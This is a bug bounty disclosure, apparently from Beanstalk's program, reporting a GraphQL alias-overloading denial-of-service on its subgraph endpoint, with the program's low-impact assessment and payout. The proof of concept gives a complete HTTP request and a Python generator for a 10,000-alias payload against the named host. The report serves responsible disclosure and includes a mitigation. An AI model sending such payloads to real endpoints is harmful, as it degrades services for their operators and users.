
Report #27311

Report Date
December 27, 2023
Status
Confirmed
Payout
1,000

GraphQL DoS on the endpoint

Report Info

Report ID

#27311

Report type

Websites and Applications

Has PoC?

Yes

Target

https://app.bean.money

Impacts

  • A temporary or self-correcting loss of website availability (e.g. a mitigatable vulnerability to DDoS)

Bug Description

During testing, it has been noticed that the GraphQL endpoint is vulnerable to DoS.

Impact

An attacker can take down the GraphQL endpoint.

Risk Breakdown

Difficulty to Exploit: Easy
Weakness:
CVSS2 Score:

Recommendation

Use the built-in protection offered for Maximum Query Depth & Query Complexity, depending on the GraphQL server implementation chosen.

References

https://checkmarx.com/blog/alias-and-directive-overloading-in-graphql/

Proof of concept

  • Navigate to the web page.
  • Send the following request to the endpoint.
POST /subgraphs/name/bean HTTP/1.1
Host: graph.node.bean.money
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://app.bean.money/
Content-Type: application/json
Content-Length: 539
Origin: https://app.bean.money
Dnt: 1
Sec-Gpc: 1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Te: trailers
Connection: close

{"query": "query { alias0:__typename \nalias1:__typename \nalias2:__typename \nalias3:__typename \nalias4:__typename \nalias5:__typename \nalias6:__typename \nalias7:__typename \nalias8:__typename \nalias9:__typename \nalias10:__typename \nalias11:__typename \nalias12:__typename \nalias13:__typename \nalias14:__typename \nalias15:__typename \nalias16:__typename \nalias17:__typename \nalias18:__typename \nalias19:__typename \nalias20:__typename \nalias21:__typename \nalias22:__typename \nalias23:__typename \nalias24:__typename \n } "}
  • Generate a payload with 10000 aliases using the following Python code:
# Initialize the result string
result = ""

# Loop over 0..9999 to generate 10000 aliases; "\\n" emits a literal
# backslash-n so the output can be pasted into the JSON "query" string
for i in range(10000):
    result += f"alias{i}:__typename \\n"

# Print the result string
print(result)
  • Copy into the query.
  • The server response takes more than 5 s to complete.

BIR-9: Beanstalk Subgraph Mitigatable DoS

BIC Response

After reviewing your bug report, we believe that it is in scope for our bug bounty program and the threat level is High.

Based on our bounty page, this submission's (Websites and Applications - High) reward is based on a set of internal criteria established by the BIC (with a minimum reward of USD 1 000), primarily taking into account the exploitability of the bug, the impact it causes and the likelihood of the vulnerability presenting itself.

The BIC determined that the impact of this issue is low given the minimal temporary downtime that would be caused by an attack. The report also describes a DDoS attack on the Beanstalk subgraph, not the UI hosted at app.bean.money, which can partially function without the subgraph. For these reasons, the BIC has determined that this bug report be rewarded 1,000 Beans.